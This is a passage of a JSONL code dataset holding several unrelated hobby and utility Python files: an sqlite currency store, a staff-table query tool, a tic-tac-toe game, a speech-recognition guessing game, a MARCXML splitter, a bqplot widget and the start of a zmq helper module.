create_conversation(self, question, answer):\n question_sentence_text = \"\"\n for question_sentence in question:\n try:\n if question_sentence.words[-1].endswith('?') or question_sentence.words[-1].endswith(')'):\n end_sign = \"\"\n else:\n end_sign = \". \"\n except Exception as e:\n YLogger.exception(self, \"Failed to get end_sign \", e)\n\n question_sentence_text += \" \".join(question_sentence.words) + end_sign\n\n answer_sentence_text = \"\"\n for answer_sentence in answer:\n try:\n if answer_sentence.words[-1].endswith('?') or answer_sentence.words[-1].endswith(')'):\n end_sign = \"\"\n else:\n end_sign = \". \"\n except Exception as e:\n YLogger.exception(self, \"Failed to get end_sign \", e)\n\n answer_sentence_text += \" \".join(answer_sentence.words) + end_sign\n\n return question_sentence_text, answer_sentence_text\n","sub_path":"src/programr/dialog/storage/mongodb.py","file_name":"mongodb.py","file_ext":"py","file_size_in_byte":7795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"9807839","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 20 09:09:02 2016\n\n@author: snewns\n\"\"\"\n\n'''Shelf module intro/demo'''\nimport shelve\n\n##Pass a filename to the shelfFile to store the shelf value in a variable\nshelfFile = shelve.open('shelfData')\n\n##Create a list\ncats = ['Sophie', 'Pooka', 'Simon']\n\n##Treat ShelfFile as a dictionary --> key of CATS had a value of cats list\nshelfFile['cats'] = cats\n\n##Close the file, and the shelf value (cats list) is stored in ShelfFile\nshelfFile.close()\n\n##Will see 3 files (.bak, .dat, .dir) which are binary files that contain the \n##data we stored in the shelf\n\n##re-open the shelf value (will be in both read + write mode)\nshelfFile = shelve.open('shelfData')\nprint(type(shelfFile))\n\n##Print the stored list from above\nprint(shelfFile['cats'])\n\n##See the keys + values\nprint(list(shelfFile.keys()))\nprint(list(shelfFile.values()))\n\nshelfFile.close()","sub_path":"Part2_AutomatingTasks/Scripts/shelfDemo.py","file_name":"shelfDemo.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"496950263","text":"import sqlite3\n\ndef connect():\n conn=sqlite3.connect('currency.db')\n cur=conn.cursor()\n cur.execute(\"CREATE TABLE IF NOT EXISTS currencies(id INTEGER PRIMARY KEY, day TEXT, current_money INTEGER, currency INTEGER)\")\n conn.commit()\n conn.close()\n\ndef insert(day,current_money,currency):\n conn=sqlite3.connect('currency.db')\n cur=conn.cursor()\n cur.execute(\"INSERT INTO currencies VALUES (NULL,?,?,?)\",(day,current_money,currency))\n conn.commit()\n conn.close()\n\ndef view():\n conn=sqlite3.connect('currency.db')\n cur=conn.cursor()\n cur.execute(\"SELECT * FROM currencies\")\n rows=cur.fetchall()\n conn.close()\n return rows\n\ndef search(day=\"\",currenct_money=\"\",currency=\"\"):\n conn=sqlite3.connec('currency.db')\n cur=conn.cursor()\n cur.execute(\"SELECT * FROM currencies WHERE day=? OR current_money=? OR currency=?\",(day,currenct_money,currency))\n rows=cur.fetchall()\n conn.close()\n return rows\n\ndef delete(id):\n conn=sqlite3.connect(\"currency.db\")\n cur=conn.cursor()\n cur.execute(\"DELETE FROM currencies WHERE id=?\",(id,))\n conn.commit()\n conn.close()\n\ndef accessing_items_in_db(a):\n conn=sqlite3.connect('currency.db')\n cur=conn.cursor()\n cur.execute(\"SELECT * FROM currencies\")\n rows=cur.fetchall()\n li=[]\n if a==\"day\":\n for item in rows:\n li.append(item[1])\n elif a==\"current_money\":\n for item in rows:\n li.append(item[2])\n elif a==\"currencies\":\n for item in rows:\n li.append(item[3])\n else:\n print(\"Please try again with: 'day' or 'current_money' or 'currencies'\")\n return li\n\n\nconnect()\n","sub_path":"Currency/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"318259988","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2018/4/10 0010 9:47\n# @Author : chelin\n# @File : stuff_manage.py\n# @Software: PyCharm\nimport os\n\nfrom tabulate import tabulate\n\nDB_FILE = \"staff.db\"\nCOLUMNS = ['id', 'name', 'age', 'phone', 'dept', 'enrolled_date']\n\n\ndef load_db(db_file):\n \"\"\"\n 加载员工信息表,并转成指定格式\n :param db_file:\n :return:\n \"\"\"\n data = {}\n for i in COLUMNS:\n data[i] = []\n\n f = open(db_file, \"r\", encoding=\"utf-8\")\n for line in f:\n staff_id, name, age, phone, dept, enrolled_date = line.split(\",\")\n data['id'].append(staff_id)\n data['name'].append(name)\n data['age'].append(age)\n data['phone'].append(phone)\n data['dept'].append(dept)\n data['enrolled_date'].append(enrolled_date)\n\n return data\n\n\ndef save_db():\n \"\"\"sync data back to db each time after editing\"\"\"\n f = open(\"%s_tmp\" % DB_FILE, \"w\", encoding=\"utf-8\")\n\n for index, val in enumerate(STAFF_DATA[COLUMNS[0]]):\n row = [str(val)]\n for col in COLUMNS[1:]:\n row.append(str(STAFF_DATA[col][index]))\n\n raw_row = \",\".join(row)\n f.write(raw_row+\"\\n\")\n f.close()\n os.rename(\"%s_tmp\" % DB_FILE, DB_FILE)\n\n\ndef syntax_parser(cmd):\n \"\"\"\n 解析语句\n :param cmd:\n :return:\n \"\"\"\n syntax_list = {\n 'find': syntax_find,\n 'add': syntax_add,\n 'update': syntax_update,\n 'delete': syntax_delete,\n }\n # 将语句按空格分割\n if cmd.split()[0] in ['find', 'add', 'update', 'delete'] and \"staff_table\" in cmd:\n # print(cmd.split()[0])\n\n if 'where' in cmd:\n query_cmd, where_clause = cmd.split(\"where\")\n # print(query_cmd, where_clause)\n\n matched_data = syntax_where(where_clause.strip())\n if matched_data: # 有匹配结果\n action_name = cmd.split()[0]\n syntax_list[action_name](query_cmd, matched_data) # 调用对应的action方法\n else:\n syntax_list[cmd.split()[0]](cmd, STAFF_DATA) # 没有where,使用所有数据\n\n else:\n print_log('''语法错误!\\nsample:[find/add/update/delete] name,age from [staff_table] where [id][>/</=/like][2]''',\n 'error')\n\n\ndef syntax_where(clause):\n \"\"\"\n 解析where条件,并查询数据\n :param clause: where条件,e.g. name=alex\n :return: False or matched data dict\n \"\"\"\n\n query_data = {} # 存储查询出来的结果\n operators = {'>': op_gt,\n '<': op_lt,\n '=': op_eq,\n 'like': op_like}\n query_condition_matched = False # 如果匹配语句都没有匹配上\n for op_key, op_func in operators.items():\n if op_key in clause:\n q_name, q_condition = clause.split(op_key)\n print(\"query:\", q_name.strip(), q_condition.strip())\n if q_name.strip() in STAFF_DATA:\n matched_data = op_func(q_name.strip(), q_condition.strip()) # 调用对应的方法\n return matched_data\n else:\n print_log(\"字段'%s' 不存在!\" % q_name, 'error')\n\n if not query_condition_matched:\n print(\"\\033[31;1mError:语句条件%s不支持\\033[0m\" % clause)\n return False\n\n\ndef op_gt(q_name, q_condition):\n \"\"\"\n find records q_name great than q_condition\n :param q_name: 查找条件key\n :param q_condition: 查找条件value\n :return:\n \"\"\"\n matched_data = {} # 把符合条件的数据都放这\n for k in STAFF_DATA:\n matched_data[k] = []\n\n q_condition = float(q_condition)\n for index, i in enumerate(STAFF_DATA[q_name]):\n if float(i) > q_condition:\n for k in matched_data:\n matched_data[k].append(STAFF_DATA[k][index]) # 把匹配的数据都添加都matched_data里\n\n print(\"matched:\", matched_data)\n\n return matched_data\n\n\ndef op_lt(q_name, q_condition):\n \"\"\"\n find records q_name less then q_condition\n :return:\n \"\"\"\n matched_data = {} # 把符合条件的数据都存储起来\n for k in STAFF_DATA:\n matched_data[k] = []\n\n q_condition = float(q_condition)\n for index, i in enumerate(STAFF_DATA[q_name]):\n if float(i) < q_condition:\n for k in matched_data:\n matched_data[k].append(STAFF_DATA[k][index])\n\n print(\"matched:\", matched_data)\n\n return matched_data\n\n\ndef op_eq(q_name, q_condition):\n \"\"\"\n find records q_name equal q_condition\n :return:\n \"\"\"\n matched_data = {} # 把符合条件的数据都存储起来\n for k in STAFF_DATA:\n matched_data[k] = []\n\n q_condition = float(q_condition)\n for index, i in enumerate(STAFF_DATA[q_name]):\n if float(i) == q_condition:\n for k in matched_data:\n matched_data[k].append(STAFF_DATA[k][index])\n\n print(\"matched:\", matched_data)\n\n return matched_data\n\n\ndef op_like(q_name, q_condition):\n \"\"\"\n find records where q_name like q_condition\n :param q_name: 查找条件key\n :param q_condtion: 查找条件value\n :return:\n \"\"\"\n matched_data = {} #把符合条件的数据存储\n for k in STAFF_DATA:\n matched_data[k] = []\n\n for index, value in enumerate(STAFF_DATA[q_name]):\n if q_condition in value:\n for k in matched_data:\n matched_data[k].append(STAFF_DATA[k][index]) #把匹配的数据都添加matched_data里\n\n #print(\"matched:\", matched_data)\n return matched_data\n\n\ndef syntax_find(query_clause, matched_data):\n \"\"\"\n find 语句\n :param query_clause:eg. find age,name from staff_table\n :param matched_data: where方法匹配到的数据\n :return:\n \"\"\"\n\n filter_keys = query_clause.split('find')[1].split('find')[0]\n print(query_clause.split('find')[1])\n columns = [i.strip() for i in filter_keys.split(',')]\n # 要过滤出来的字段\n if \"*\" in columns:\n if len(columns) == 1: # 只有find * from ...成立,*不能与其他字段同时出现\n columns = COLUMNS\n else:\n print_log(\"* 不能同时与其他字段一起出现\", \"error\")\n return False\n if len(columns) == 1:\n if not columns[0]:\n print_log(\"语法错误,find和from之间必须跟字段名或*\", \"error\")\n return False\n filtered_data = []\n for index, val in enumerate(matched_data[columns[0]]):\n # 拿要查找的多列的第一个元素,[name, age, dept],拿到name,到数据库匹配,然后这一列的每个值的索引到其他列表里依次找\n row = [val, ]\n # if columns[1:]: # 代表是多列过滤\n for col in columns[1:]:\n row.append(matched_data[col][index])\n print(\"row\", row)\n filtered_data.append(row)\n\n print(tabulate(filtered_data, headers=columns, tablefmt=\"grid\"))\n print_log(\"匹配到 %s 条记录\" % len(filtered_data))\n\n\ndef syntax_add(query_clause, matched_data):\n \"\"\"\n sample: add staff Alex li,25,1231231231,IT,2015-10-29\n :param query_clause: add staff Alex,25,1231231231,IT,2015-10-29\n :param matched_data:\n :return:\n \"\"\"\n column_vals = [col.strip() for col in query_clause.split(\"valuse\")[1].split(',')]\n # print(\"cols',column_vals)\n if len(column_vals) == len(COLUMNS[1:]):\n\n # find max id first, and then plus one, becomes the id of this new record\n init_staff_id = 0\n for i in STAFF_DATA['id']:\n if int(i) > init_staff_id:\n init_staff_id = int(i)\n\n init_staff_id += 1 # 当前最大id再+ 1\n STAFF_DATA['id'].append(init_staff_id)\n for index, col in enumerate(COLUMNS[1:]):\n STAFF_DATA[col].append(column_vals[index])\n\n else:\n print_log(\"提供的字段数据不足,必须字段%s\" % COLUMNS[1:], 'error')\n\n print(tabulate(STAFF_DATA, headers=COLUMNS))\n save_db()\n print_log(\"成功添加1条记录到staff_table表\")\n\n\ndef syntax_update(query_clause, matched_data):\n pass\n\n\ndef syntax_delete(query_clause, matched_data):\n pass\n\n\ndef print_log(msg, msg_type='info'):\n if msg_type == \"error\":\n print(\"\\033[31;1mError:%s\\033[0m\" % msg)\n else:\n print(\"\\033[32;1mInfo:%s\\033[0m\" % msg)\n\n\ndef main():\n \"\"\"\n 程序主入口\n :return:\n \"\"\"\n while True:\n cmd = input(\"[staff db]:\").strip()\n if not cmd: continue\n syntax_parser(cmd)\n\n\nSTAFF_DATA = load_db(DB_FILE)\nprint(STAFF_DATA)\n\nmain()\n","sub_path":"stuff_manage.py","file_name":"stuff_manage.py","file_ext":"py","file_size_in_byte":8547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"140535701","text":"import unittest\n\nfunc = __import__(\"func\")\n\nclass TestFunc(unittest.TestCase):\n\n def check_data(self, biomarkers, expectedResult) :\n #resp, code, headers = func.main(biomarkers)\n resp, code = func.main(biomarkers)\n self.assertEqual(resp[\"issepsis\"], expectedResult)\n self.assertEqual(code, 200)\n #self.assertEqual(headers[\"content-type\"], \"application/json\")\n return biomarkers, expectedResult\n\n def test_func(self) :\n\n #test no sepsis\n data = {\n \"HR\":103,\n \"O2Sat\":90,\n \"Temp\": None,\n \"SBP\": None,\n \"MAP\": None,\n \"DBP\": None,\n \"Resp\":30,\n \"EtCO2\": None,\n \"BaseExcess\":21,\n \"HCO3\":45,\n \"FiO2\": None,\n \"pH\":7.37,\n \"PaCO2\":90,\n \"SaO2\":91,\n \"AST\":16,\n \"BUN\":14,\n \"Alkalinephos\":98,\n \"Calcium\":9.3,\n \"Chloride\":85,\n \"Creatinine\":0.7,\n \"Glucose\":193,\n \"Lactate\": None,\n \"Magnesium\":2,\n \"Phosphate\":3.3,\n \"Potassium\":3.8,\n \"Bilirubin_total\":0.3,\n \"Hct\":37.2,\n \"Hgb\":12.5,\n \"PTT\": None,\n \"WBC\":5.7,\n \"Fibrinogen\": None,\n \"Platelets\":317\n}\n\n # test yes sepsis\n data2 = {\n \"HR\":72.0,\n \"O2Sat\":96.0,\n \"Temp\": None,\n \"SBP\":103.0,\n \"MAP\":62.0,\n \"DBP\":45.0,\n \"Resp\":20.0,\n \"EtCO2\": None,\n \"BaseExcess\":-1.0,\n \"HCO3\": None,\n \"FiO2\": None,\n \"pH\":7.4,\n \"PaCO2\":36.0,\n \"SaO2\":98.0,\n \"AST\": None,\n \"BUN\": None,\n \"Alkalinephos\": None,\n \"Calcium\": None,\n \"Chloride\": None,\n \"Creatinine\": None,\n \"Glucose\": None,\n \"Lactate\": None,\n \"Magnesium\": None,\n \"Phosphate\": None,\n \"Potassium\": None,\n \"Bilirubin_total\": None,\n \"Hct\": None,\n \"Hgb\": None,\n \"PTT\": None,\n \"WBC\": None,\n \"Fibrinogen\": None,\n \"Platelets\": None\n}\n \n #run tests\n self.check_data(biomarkers = data, expectedResult = 0)\n self.check_data(biomarkers = data2, expectedResult = 1)\n\n # test with missing fields\n # no sepsis ..for some reason if we remove Temp from list the expected result is wrong. TODO: investigate\n data = {\n \"HR\":103,\n \"O2Sat\":90,\n \"Temp\": None,\n \"Resp\":30,\n \"BaseExcess\":21,\n \"HCO3\":45,\n \"pH\":7.37,\n \"PaCO2\":90,\n \"SaO2\":91,\n \"AST\":16,\n \"BUN\":14,\n \"Alkalinephos\":98,\n \"Calcium\":9.3,\n \"Chloride\":85,\n \"Creatinine\":0.7,\n \"Glucose\":193,\n \"Magnesium\":2,\n \"Phosphate\":3.3,\n \"Potassium\":3.8,\n \"Bilirubin_total\":0.3,\n \"Hct\":37.2,\n \"Hgb\":12.5,\n \"WBC\":5.7,\n \"Platelets\":317\n}\n\n #sepsis\n data2 = {\n \"HR\":72.0,\n \"O2Sat\":96.0,\n \"SBP\":103.0,\n \"MAP\":62.0,\n \"DBP\":45.0,\n \"Resp\":20.0,\n \"BaseExcess\":-1.0,\n \"pH\":7.4,\n \"PaCO2\":36.0,\n \"SaO2\":98.0\n}\n\n print(\"******Checking missing biomarkers*****\")\n self.check_data(data, 0)\n self.check_data(data2, 1)\n\n \nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"serving/fn/test_func.py","file_name":"test_func.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"17203515","text":"import tkinter as tk\r\nfrom tkinter import*\r\nimport math\r\npersonplaying =\"O\"\r\nb =\"b\"\r\nmaster = Tk()\r\n#our 2d array for our grid\r\ntwodarray =[[b,b,b],\r\n [b,b,b],\r\n [b,b,b]]\r\nwinner =\"\"\r\nmoves =0\r\n\r\ndef finish():\r\n global master\r\n global winner\r\n global moves\r\n moves =0\r\n output = str(winner)+\" is \\n the winner\"\r\n winnerb =Label(width =300,height =300)\r\n winnerb.place(x=10,y=10)\r\n winner =Label(text=output,width =10,height =5)\r\n winner.place(x=10,y=10)\r\n playagain = Button(text =\"play again\",command =loading)\r\n playagain.place(x=10,y =70)\r\n #refreshes the 2d array\r\n twodarray[0][0] =\"b\"\r\n twodarray[0][1] =\"b\"\r\n twodarray[0][2] =\"b\"\r\n \r\n twodarray[1][0] =\"b\"\r\n twodarray[1][1] =\"b\"\r\n twodarray[1][2] =\"b\"\r\n \r\n twodarray[2][0] =\"b\"\r\n twodarray[2][1] =\"b\"\r\n twodarray[2][2] =\"b\"\r\n personplaying =\"O\"\r\n\r\n\r\ndef a1move():\r\n global x\r\n global y\r\n x =0\r\n y =0\r\n move()\r\ndef a2move():\r\n global x\r\n global y\r\n x =1\r\n y =0\r\n move()\r\ndef a3move():\r\n global x\r\n global y\r\n x =2\r\n y =0\r\n move()\r\ndef b1move():\r\n global x\r\n global y\r\n x =0\r\n y =1\r\n move()\r\ndef b2move():\r\n global x\r\n global y\r\n x =1\r\n y =1\r\n move()\r\ndef b3move():\r\n global x\r\n global y\r\n x =2\r\n y =1\r\n move()\r\ndef c1move():\r\n global x\r\n global y\r\n x =0\r\n y =2\r\n move()\r\ndef c2move():\r\n global x\r\n global y\r\n x =1\r\n y =2\r\n move()\r\ndef c3move():\r\n global x\r\n global y\r\n x =2\r\n y =2\r\n move()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef move():\r\n global personplaying\r\n global twodarrary\r\n global winner\r\n global moves\r\n print(x,y)\r\n moves =moves +1\r\n #picks the symbol to draw on the grid\r\n if personplaying ==\"X\":\r\n personplaying =\"O\"\r\n else:\r\n personplaying =\"X\"\r\n twodarray[y][x] =personplaying\r\n print(twodarray[0])\r\n print(twodarray[1])\r\n print(twodarray[2])\r\n oso = Label(text =personplaying,height =1,width =2)\r\n oso.config(font=('Comic Sans MS', 45, 'bold italic'))\r\n\r\n\r\n #deciding who has won\r\n if twodarray[0][0] ==twodarray[0][1] and twodarray[0][1] == twodarray[0][2]:\r\n if twodarray[0][0] != \"b\":\r\n print(twodarray[0][0] ,\"is the winner\")\r\n winner = twodarray[0][0]\r\n finish()\r\n elif twodarray[1][0] ==twodarray[1][1] and twodarray[1][1] == twodarray[1][2]:\r\n if twodarray[1][0] != \"b\":\r\n winner = twodarray[1][0]\r\n print(twodarray[1][0] ,\"is the winner\")\r\n finish()\r\n elif twodarray[2][0] ==twodarray[2][1] and twodarray[2][1] == twodarray[2][2]:\r\n if twodarray[2][0] != \"b\":\r\n winner =twodarray[2][0]\r\n print(twodarray[2][0] ,\"is the winner\")\r\n finish()\r\n \r\n elif twodarray[0][0] ==twodarray[1][0] and twodarray[1][0] == twodarray[2][0]:\r\n if twodarray[0][0] != \"b\":\r\n winner = twodarray[0][0]\r\n print(twodarray[0][0] ,\"is the winner\")\r\n finish()\r\n elif twodarray[0][1] ==twodarray[1][1] and twodarray[1][1] == twodarray[2][1]:\r\n if twodarray[0][1] != \"b\":\r\n winner = twodarray[0][1]\r\n print(twodarray[0][1] ,\"is the winner\")\r\n finish()\r\n elif twodarray[0][2] ==twodarray[1][2] and twodarray[1][2] == twodarray[2][2]:\r\n if twodarray[0][2] != \"b\":\r\n winner = twodarray[0][2]\r\n print(twodarray[0][2] ,\"is the winner\")\r\n finish()\r\n \r\n elif twodarray[0][0] ==twodarray[1][1] and twodarray[1][1] == twodarray[2][2]:\r\n if twodarray[0][0] != \"b\":\r\n winner = twodarray[0][0]\r\n print(twodarray[0][0] ,\"is the winner\")\r\n finish()\r\n elif twodarray[0][2] ==twodarray[1][1] and twodarray[1][1] == twodarray[2][0]:\r\n if twodarray[0][2] != \"b\":\r\n winner = twodarray[0][2]\r\n print(twodarray[0][2] ,\"is the winner\")\r\n finish()\r\n if moves ==9:\r\n winner =\"nobody\"\r\n print(\"nobody is the winner\")\r\n finish()\r\n\r\n oso.place(x=10+(x*80),y=10+(y*85))\r\n\r\ndef startup():\r\n global master\r\n twodarray =[[b,b,b],\r\n [b,b,b],\r\n [b,b,b]]\r\n winnerb =Label(width =300,height =300)\r\n winnerb.place(x=10,y=10)\r\n #draws the buttons\r\n a1 = Button(text=\" \",height = 5,width =10,command = a1move)\r\n a1.place( x=10,y=10)\r\n \r\n a2 = Button(text=\" \",height = 5,width =10,command = a2move)\r\n a2.place(x=90,y=10)\r\n \r\n a3 = Button(text=\" \",height = 5,width =10,command = a3move)\r\n a3.place(x=170,y=10)\r\n \r\n b1 = Button(text=\" \",height = 5,width =10,command = b1move)\r\n b1.place( x=10,y=95)\r\n \r\n b2 = Button(text=\" \",height = 5,width =10,command = b2move)\r\n b2.place(x=90,y=95)\r\n \r\n b3 = Button(text=\" \",height = 5,width =10,command = b3move)\r\n b3.place(x=170,y=95)\r\n \r\n c1 = Button(text=\" \",height = 5,width =10,command = c1move)\r\n c1.place(x=10,y=180)\r\n \r\n c2 = Button(text=\" \",height = 5,width =10,command = c2move)\r\n c2.place( x=90,y=180)\r\n \r\n c3 = Button(text=\" \",height = 5,width =10,command = c3move)\r\n c3.place(x=170,y=180)\r\n \r\n\r\n\r\n \r\n\r\n\r\ndef loading():\r\n global master\r\n twodarray =[[b,b,b],\r\n [b,b,b],\r\n [b,b,b]]\r\n winner =\"\"\r\n\r\n winnerb =Label(width =300,height =300)\r\n winnerb.place(x=10,y=10)\r\n startup1 = Label(text=\"naughts and crosses \\n -by Tom Leigh-\")\r\n startup1.place(x=10,y=10)\r\n\r\n startupb = Button(text=\"click here to \\n start the game\",command = startup)\r\n startupb.place(x=22,y=45)\r\nloading()\r\n","sub_path":"nac.py","file_name":"nac.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"611200458","text":"import random\nimport time\nimport speech_recognition as sr\nimport sys\n\n\ndef EnterGameLogic():\n\n WORDS = [\"昂首闊步\", \"碧海青天\", \"拔刀相助\", \"安安穩穩\", \"奔走相告\", \"愛人以德\"]\n NUM_GUESSES = 3\n PROMPT_LIMIT = 5\n\n answer = random.choice(WORDS)\n\n response = {\n \"success\": True,\n \"error\": None,\n \"transcription\": None\n }\n\n instructions = (\n \"請由以下的成語中猜中一個:\\n\"\n \"{words}\\n\"\n \"每次遊玩共有{n}機會。\\n\"\n ).format(words=', '.join(WORDS), n=NUM_GUESSES)\n # create recognizer and mic instances\n print(instructions)\n guess_counter = 0\n #prompt_counter= 0\n rec = sr.Recognizer()\n mic = sr.Microphone()\n rec.energy_threshold = 300\n audio_clip = None\n if not isinstance(rec, sr.Recognizer):\n raise TypeError(\"`recognizer` must be `Recognizer` instance\")\n\n if not isinstance(mic, sr.Microphone):\n raise TypeError(\"`microphone` must be `Microphone` instance\")\n\n with mic as source:\n rec.adjust_for_ambient_noise(source)\n audio_clip = rec.listen(source)\n\n\n while 1:\n guess_counter += 1\n #print('進行第 {} 次猜看看. 請說:'.format(guess_counter))\n print(\"進行辨識,\")\n guess = rec.recognize_google(audio_clip, language=\"zh-TW\")\n res = response\n try: \n res[\"transcription\"] = guess\n except sr.RequestError:\n res[\"success\"] = False\n res[\"error\"] = \"Google語音API無法使用\"\n except sr.UnknownValueError:\n res[\"error\"] = \"您的輸入有���題,請重新啟動程式\"\n #print(guess)\n if not res[\"success\"]:\n break\n \n # 如果程式發生錯誤,跳出while-loop\n if res[\"error\"]:\n print(\"發生錯誤: {}\".format(res[\"error\"]))\n break\n \n # 輸出玩家講的結果\n print(\"你/妳的答案: {}\".format(res[\"transcription\"]))\n #進行答案比對及計算使用者是否可以再繼玩\n guess_is_correct = res[\"transcription\"] == answer\n user_has_more_attempts = guess_counter < NUM_GUESSES\n if guess_is_correct:\n print(\"答對了,恭喜你/妳獲得獎金:.......100萬(顆石頭)\".format(answer))\n break\n elif user_has_more_attempts:\n print(\"不對喔,不過你/妳還有{}次機會.\\n\".format(guess_counter))\n else:\n print(\"抱歉,沒猜中耶,\\n正確答案是: '{}'.\".format(answer))\n break\n\nif __name__==\"__main__\":\n EnterGameLogic()\n","sub_path":"audio/takeguess_game_v1_debug.py","file_name":"takeguess_game_v1_debug.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"40681453","text":"#!/usr/bin/env python3\n\n# https://stackoverflow.com/questions/36155049/splitting-xml-file-into-multiple-at-given-tags\n# Plus some optional input/wrappering\n\nimport argparse\nimport sys\nimport os\nimport xml.etree.ElementTree as ET\n\nparser = argparse.ArgumentParser()\nparser.add_argument('inputxml', metavar='[XML to split]',\n help='XML file you need to split')\nparser.add_argument('outputdir', metavar='[Output directory]',\n help='Output directory for split MARCXML')\nargs = parser.parse_args()\n\noutputdir = args.outputdir\n\ntry:\n os.mkdir(outputdir)\nexcept FileExistsError:\n sys.exit('Output directory already exists. Quitting!')\n\n\n# Right now this doesn't check if the file exists before\n# trying to read it...\nwith open(args.inputxml) as xmlfile:\n xmltosplit = ET.iterparse(xmlfile, events=('end', ))\n for event, elem in xmltosplit:\n ldr = None\n ctrlfld = None\n bibid = None\n datafld = None\n barcode = None\n record = None\n\n if elem.tag == 'record':\n ldr = elem.find('leader').text[6:8]\n ctrlfld = elem.findall('controlfield')\n for cf in ctrlfld:\n if cf.attrib['tag'] == '001':\n bibid = cf.text\n datafld = elem.findall('datafield')\n for df in datafld:\n if df.attrib['tag'] == '955':\n for dfc in df.getchildren():\n if dfc.attrib['code'] == 'b':\n barcode = dfc.text\n\n newrec = ET.Element('collection')\n newrec.insert(0, elem)\n record = ET.ElementTree(newrec)\n\n outputxmlname = '{0}_{1}_{2}.xml'.format(bibid, barcode, ldr)\n outputdest = os.path.join(outputdir, outputxmlname)\n\n record.write(outputdest, xml_declaration=True, encoding='utf-8',\n method='xml')\n\n\n# BIBID - BARCODE - LEADER 06-07 - DOT - XML\n","sub_path":"xmlsplit/xmlsplit.py","file_name":"xmlsplit.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"197011139","text":"from .Interactor import Interactor\nimport bqplot as bq\nimport ipywidgets as ipy\nimport numpy as np\n\n\nclass SegmentSelector(Interactor):\n\n def __init__(self, title=\"Segment Selector: \"):\n # mark to draw over the image plot also used to\n # define the bounding box for which the segment is defined\n self.segment_mark = None\n self.segment_drawer = None # segment drawing interactor\n # upon which diagonal to draw the segment\n # within the selected bounding box\n self.segment_draw_diagonal = False\n self.title = title\n\n def link_with(self, display_pane):\n super().link_with(display_pane)\n\n self.segment_mark, self.segment_drawer = self.make_segment_mark_and_drawer()\n\n self.ipy_controls = ipy.HBox([\n ipy.Label(self.title),\n self.make_segment_draw_mode_toggler(),\n self.make_segment_draw_diag_switch()\n ])\n\n super().set_image_plot_marks([self.segment_mark])\n\n def make_segment_mark_and_drawer(self):\n mark = bq.Lines(\n scales=self.display_pane.image_plot_scales,\n x=[0.40, 0.60],\n y=[0.40, 0.60]\n )\n\n drawer = bq.interacts.BrushSelector(\n x_scale=self.display_pane.image_plot_scales['x'],\n y_scale=self.display_pane.image_plot_scales['y'],\n color='blue'\n )\n\n def on_interaction(change):\n if change['name'] == 'selected_x':\n mark.x = np.empty(\n shape=(0,)) if change['new'] is None else change['new']\n elif change['name'] == 'selected_y':\n if change['new'] is None:\n mark.y = np.empty(shape=(0,))\n else:\n if self.segment_draw_diagonal:\n mark.y = list(reversed(change['new']))\n else:\n mark.y = change['new']\n self.update_observers()\n\n drawer.observe(on_interaction, ['selected_x', 'selected_y'])\n\n return mark, drawer\n\n def make_segment_draw_mode_toggler(self):\n togglebutton = ipy.ToggleButton(\n value=False,\n tooltip='Edit Segment Selector',\n icon='edit'\n )\n\n def on_toggle(change):\n if change['new']:\n self.display_pane.set_interaction(self.segment_drawer)\n else:\n self.display_pane.clear_interaction()\n\n togglebutton.observe(on_toggle, 'value')\n self.display_pane.add_to_togglebutton_group(togglebutton)\n return togglebutton\n\n def make_segment_draw_diag_switch(self):\n button = ipy.Button(\n value=False,\n icon='arrows-h',\n tooltip='Swap Segment Selector Direction'\n )\n\n def handle_click(_change):\n self.segment_draw_diagonal = not self.segment_draw_diagonal\n self.segment_mark.y = list(reversed(self.segment_mark.y))\n self.update_observers()\n\n button.on_click(handle_click)\n\n return button\n","sub_path":"DisplayPane/Interactor/SegmentSelector.py","file_name":"SegmentSelector.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"397799540","text":"def dSum(n):\n s = 0\n for i in range(1, n - 1):\n if n % i == 0:\n s += i\n return s\n\nT = int(input())\nfor t in range(T):\n x = int(input())\n if dSum(x) < 2 * x: print(1)\n else: print(0)","sub_path":"Code/CodeRecords/2212/49405/258574.py","file_name":"258574.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"240428095","text":"\nimport zmq\nimport errno\nimport msgpack\n\nimport threading as mt\n\nfrom ..logger import Logger\nfrom ..profile import Profiler\n\n\n# --------------------------------------------------------------------------\n#\n# zmq will (rightly) barf at interrupted system calls. We are able to rerun\n# those calls.\n#\n# This is presumably rare, and repeated interrupts increasingly unlikely.\n# More than, say, 3 point to races or I/O thrashing\n#\n# FIXME: how does that behave wrt. timeouts? We probably should include\n# an explicit timeout parameter.\n#\n# kudos: https://gist.github.com/minrk/5258909\n#\ndef no_intr(f, *args, **kwargs):\n\n _max = 3\n cnt = 0\n return f(*args, **kwargs)\n while True:\n try:\n return f(*args, **kwargs)\n\n except zmq.ContextTerminated:\n return None # connect closed or otherwise became unusable\n\n except zmq.ZMQError as e:\n if e.errno == errno.EINTR:\n if cnt > _max:\n raise # interrupted too often - forward exception\n cnt += 1\n continue # interrupted, try again\n raise # some other error condition, raise it\n\n\n# ------------------------------------------------------------------------------\n#\ndef log_bulk(log, bulk, token):\n\n if not bulk:\n # log.debug(\"%s: None\", token)\n 